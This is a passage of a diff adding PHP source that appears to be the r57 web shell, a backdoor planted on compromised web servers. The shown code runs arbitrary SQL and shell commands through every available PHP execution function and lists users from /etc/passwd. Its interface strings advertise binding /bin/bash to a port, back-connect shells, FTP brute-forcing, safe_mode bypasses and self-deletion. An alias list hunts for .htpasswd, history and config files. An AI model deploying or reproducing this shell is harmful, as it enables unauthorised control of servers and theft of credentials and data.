($_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà', +'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå', +'ru_text3' =>'Âûïîëíèòü êîìàíäó', +'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ', +'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð', +'ru_text6' =>'Ëîêàëüíûé ôàéë', +'ru_text7' =>'Àëèàñû', +'ru_text8' =>'Âûáåðèòå àëèàñ', +'ru_butt1' =>'Âûïîëíèòü', +'ru_butt2' =>'Çàãðóçèòü', +'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', +'ru_text10'=>'Îòêðûòü ïîðò', +'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà', +'ru_butt3' =>'Îòêðûòü', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-àäðåñ', +'ru_text14'=>'Ïîðò', +'ru_butt4' =>'Âûïîëíèòü', +'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà', +'ru_text16'=>'Èñïîëüçîâàòü', +'ru_text17'=>'Óäàëåííûé ôàéë', +'ru_text18'=>'Ëîêàëüíûé ôàéë', +'ru_text19'=>'Exploits', +'ru_text20'=>'Èñïîëüçîâàòü', +'ru_text21'=>'Íîâîå èìÿ', +'ru_text22'=>'datapipe', +'ru_text23'=>'Ëîêàëüíûé ïîðò', +'ru_text24'=>'Óäàëåííûé õîñò', +'ru_text25'=>'Óäàëåííûé ïîðò', +'ru_text26'=>'Èñïîëüçîâàòü', +'ru_butt5' =>'Çàïóñòèòü', +'ru_text28'=>'Ðàáîòà â safe_mode', +'ru_text29'=>'Äîñòóï çàïðåùåí', +'ru_butt6' =>'Ñìåíèòü', +'ru_text30'=>'Ïðîñìîòð ôàéëà', +'ru_butt7' =>'Âûâåñòè', +'ru_text31'=>'Ôàéë íå íàéäåí', +'ru_text32'=>'Âûïîëíåíèå PHP êîäà', +'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL', +'ru_butt8' =>'Ïðîâåðèòü', +'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include', +'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql', +'ru_text36'=>'Áàçà . Òàáëèöà', +'ru_text37'=>'Ëîãèí', +'ru_text38'=>'Ïàðîëü', +'ru_text39'=>'Áàçà', +'ru_text40'=>'Äàìï òàáëèöû áàçû äàííûõ', +'ru_butt9' =>'Äàìï', +'ru_text41'=>'Ñîõðàíèòü â ôàéëå', +'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà', +'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë', +'ru_butt10'=>'Ñîõðàíèòü', +'ru_butt11'=>'Ðåäàêòèðîâàòü', +'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!', +'ru_text45'=>'Ôàéë ñîõðàíåí', +'ru_text46'=>'Ïðîñìîòð phpinfo()', +'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini', +'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ', +'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà', +'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå', +'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè', +'ru_text52'=>'Òåêñò äëÿ ïîèñêà', +'ru_text53'=>'Èñêàòü â ïàïêå', +'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ', +'ru_butt12'=>'Íàéòè', +'ru_text55'=>'Òîëüêî â ôàéëàõ', +'ru_text56'=>'Íè÷åãî íå íàéäåíî', +'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ', +'ru_text58'=>'Èìÿ', +'ru_text59'=>'Ôàéë', +'ru_text60'=>'Äèðåêòîðèþ', +'ru_butt13'=>'Ñîçäàòü/Óäàëèòü', +'ru_text61'=>'Ôàéë ñîçäàí', +'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà', +'ru_text63'=>'Ôàéë óäàëåí', +'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà', +'ru_text65'=>'Ñîçäàòü', +'ru_text66'=>'Óäàëèòü', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'Êîìàíäà', +'ru_text69'=>'Ïàðàìåòð1', +'ru_text70'=>'Ïàðàìåòð2', +'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)", +'ru_text72'=>'Òåêñò äëÿ ïîèñêà', +'ru_text73'=>'Èñêàòü â ïàïêå', +'ru_text74'=>'Èñêàòü â ôàéëàõ', +'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå', +'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find', +'ru_text80'=>'Òèï', +'ru_text81'=>'Ñåòü', +'ru_text82'=>'Áàçû äàííûõ', +'ru_text83'=>'Âûïîëíåíèå SQL çàïðîñà', +'ru_text84'=>'SQL çàïðîñ', +'ru_text85'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç âûïîëíåíèå êîìàíä â MSSQL ñåðâåðå', +'ru_text86'=>'Ñêà÷èâàíèå ôàéëà ñ ñåðâåðà', +'ru_butt14'=>'Ñêà÷àòü', +'ru_text87'=>'Ñêà÷èâàíèå ôàéëîâ ñ óäàëåííîãî ftp-ñåðâåðà', +'ru_text88'=>'FTP-ñåðâåð:ïîðò', +'ru_text89'=>'Ôàéë íà ftp ñåðâåðå', +'ru_text90'=>'Ðåæèì ïåðåäà÷è', +'ru_text91'=>'Àðõèâèðîâàòü â', +'ru_text92'=>'áåç àðõèâàöèè', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-áðóòôîðñ', +'ru_text95'=>'Ñïèñîê ïîëüçîâàòåëåé', +'ru_text96'=>'Íå óäàëîñü ïîëó÷èòü ñïèñîê ïîëüçîâàòåëåé', +'ru_text97'=>'Ïðîâåðåíî êîìáèíàöèé: ', +'ru_text98'=>'Óäà÷íûõ ïîäêëþ÷åíèé: ', +'ru_text99'=>'* â êà÷åñòâå ëîãèíà è ïàðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâàòåëÿ èç /etc/passwd', +'ru_text100'=>'Îòïðàâêà ôàéëîâ íà óäàëåííûé ôòï ñåðâåð', +'ru_text101'=>'Èñïîëüçîâàòü òàêæå ïåðåâåðíóòîå (user -> resu) èìÿ ïîëüçîâàòåëÿ â êà÷åñòâå ïàðîëÿ', +'ru_text102'=>'Ïî÷òà', +'ru_text103'=>'Îòïðàâêà ïèñüìà', +'ru_text104'=>'Îòïðàâêà ôàéëà íà ïî÷òîâûé ÿùèê', +'ru_text105'=>'Êîìó', +'ru_text106'=>'Îò', +'ru_text107'=>'Òåìà', +'ru_butt15'=>'Îòïðàâèòü', +'ru_text108'=>'Òåêñò ïèñüìà', +'ru_text109'=>'Ñâåðíóòü', +'ru_text110'=>'Ðàçâåðíóòü', +'ru_text111'=>'SQL-Ñåðâåð : ïîðò', +'ru_text112'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç èñïîëüçîâàíèå ôóíêöèè mb_send_mail', +'ru_text113'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ëèñòèíãà äèðåêòîðèé ñ èñïîëüçîâàíèåì imap_list', +'ru_text114'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode, ïðîñìîòð ñîäåðæèìîãî ôàéëà ñ èñïîëüçîâàíèåì imap_body', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', +'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', +); +/* +Àëèàñû êîìàíä +Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè ) +Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>è</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('Íå óäàëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðâåðó','Îøèáêà àâòîðèçàöèè íà ftp ñåðâåðå','Íå óäàëîñü ïîìåíÿòü äèðåêòîðèþ íà ftp ñåðâåðå'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('Íå óäàëîñü îòïðàâèòü ïèñüìî','Ïèñüìî îòïðàâëåíî'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + 